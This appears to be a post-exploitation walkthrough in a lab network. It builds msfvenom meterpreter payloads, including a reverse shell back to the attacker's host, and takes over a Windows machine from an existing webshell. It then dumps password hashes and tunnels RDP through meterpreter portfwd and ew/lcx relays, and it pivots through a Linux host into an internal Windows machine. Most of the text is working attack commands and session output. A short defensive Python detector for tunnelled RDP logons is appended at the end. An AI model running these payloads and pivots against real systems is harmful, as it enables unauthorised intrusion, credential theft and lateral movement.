The premise is that we already have a webshell on the Windows machine.

  • PS: when generating the payload, add -b "\x00" to avoid a segmentation fault.

Environment

  • Attacker: 192.168.190.1
  • WIN: 192.168.190.130

Basic Windows post-exploitation operations

Now that we have a webshell on the Windows box, to get more out of the foothold, use msfvenom to generate a payload and upload it.

```
> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.1 lport=5555 -f exe -o shell.exe
```

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 5555
lport => 5555
msf5 exploit(multi/handler) > set lhost 192.168.190.1
lhost => 192.168.190.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.190.1:5555
[*] Sending stage (179779 bytes) to 192.168.190.130
[*] Meterpreter session 1 opened (192.168.190.1:5555 -> 192.168.190.130:49295) at 2018-05-15 16:59:50 +0800
[*] Sending stage (179779 bytes) to 192.168.190.130
[*] Meterpreter session 2 opened (192.168.190.1:5555 -> 192.168.190.130:49296) at 2018-05-15 16:59:51 +0800
meterpreter >
```

With a meterpreter shell on a Windows machine, the next step is to find a way to reach the remote desktop service on port 3389.

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c5d7e0c089c0:::
```

Crack the hashes to recover the plaintext password.

Then use port forwarding to forward port 3389 on the target machine to local port 2222.

```
meterpreter > portfwd add -l 2222 -r 192.168.190.130 -p 3389
```

Another way is to use ew; the powerful ew integrates lcx's port-forwarding functionality.

Run on the target machine:

```
ew_for_Win.exe -s lcx_slave -d 192.168.190.1 -e 3333 -f 127.0.0.1 -g 3389
```

This connects the local port 3389 to port 3333 on 192.168.190.1. Then run on the attacker machine:

```
ew_for_Win.exe -s lcx_listen -l 3334 -e 3333
```

This hands connections made to local port 3334 over to the host that connected back on port 3333.

Then connect with a remote desktop client locally.

Alternatively, use:

```
ew_for_Win.exe -s lcx_tran -l 1080 -f 127.0.0.1 -g 3389
```

Then we simply connect to port 1080 on 192.168.190.130.

Windows in the internal network

Another scenario is that we have a Linux machine and there is a Windows host on its internal network.

Environment

```
Attacker: 192.168.190.1
linux: 192.168.190.130
windows: 192.168.116.129
```

Generate a bind payload and upload it:

```
msfvenom -p linux/x86/meterpreter/bind_tcp lport=5555 -b "\x00" -f elf -o shell2.elf
```

Connect forward to it from the local machine:

```
Payload options (linux/x86/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 5555 yes The listen port
RHOST 192.168.190.128 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf5 exploit(multi/handler) > run
```

Then add the route.

Then implant the msf payload on the Windows host through a vulnerability in it:

```
msfvenom -p windows/meterpreter/bind_tcp lport=5555 -f exe -o shell.exe
```

```
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 5555 yes The listen port
RHOST 192.168.116.129 no The target address
```

Because the route is in place, we can directly use:

```
meterpreter > portfwd add -l 2222 -r 192.168.116.129 -p 3389
```

Then connect to local port 2222.
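From the defender's side, both forwarding setups above (lcx_tran relaying to 127.0.0.1:3389, and meterpreter portfwd connecting to the host's own 3389) leave a trace: the resulting RDP logon is recorded in Windows Security event 4624 with LogonType 10 (RemoteInteractive), but its IpAddress is loopback or the host's own address instead of a real client. The following detector is an added example, not code from the original post; it assumes the events have already been parsed into dicts with the event's own field names, and the sample events are constructed.

```python
# Added example (defender's view): flag RDP logons that arrive through a local
# port forward. Security event 4624 with LogonType 10 (RemoteInteractive) should
# carry the real client address in IpAddress; when RDP traffic is relayed by a
# forwarder running on the host itself, the source shows up as loopback or as
# the host's own address instead. Field names assume a parsed 4624 record.
from ipaddress import ip_address

LOOPBACK = {"127.0.0.1", "::1"}


def suspicious_rdp_logon(event, host_addrs):
    """True if `event` is a successful RDP logon whose source is loopback or
    one of this host's own addresses (likely tunnelled via a local forwarder)."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 10:
        return False
    src = event.get("IpAddress", "-")
    if src in LOOPBACK:
        return True
    try:
        return str(ip_address(src)) in host_addrs
    except ValueError:  # "-" or a malformed address: nothing to compare
        return False


def find_tunnelled_rdp(events, host_addrs):
    """Return the subset of parsed 4624 events that look tunnelled."""
    return [e for e in events if suspicious_rdp_logon(e, host_addrs)]


# Constructed sample events (not real log data); addresses from the lab above.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "Administrator", "IpAddress": "127.0.0.1"},
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "Administrator", "IpAddress": "192.168.190.130"},
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "alice", "IpAddress": "192.168.190.50"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "svc", "IpAddress": "127.0.0.1"},
    {"EventID": 4625, "LogonType": 10, "TargetUserName": "bob", "IpAddress": "::1"},
]
HOST_ADDRS = {"192.168.190.130"}  # the monitored host's own interface addresses

if __name__ == "__main__":
    for e in find_tunnelled_rdp(SAMPLE_EVENTS, HOST_ADDRS):
        print("possible tunnelled RDP logon:", e["TargetUserName"], "from", e["IpAddress"])
```

A network logon (LogonType 3) from loopback and a failed logon (4625) are deliberately left out so the rule stays specific to successful interactive RDP sessions.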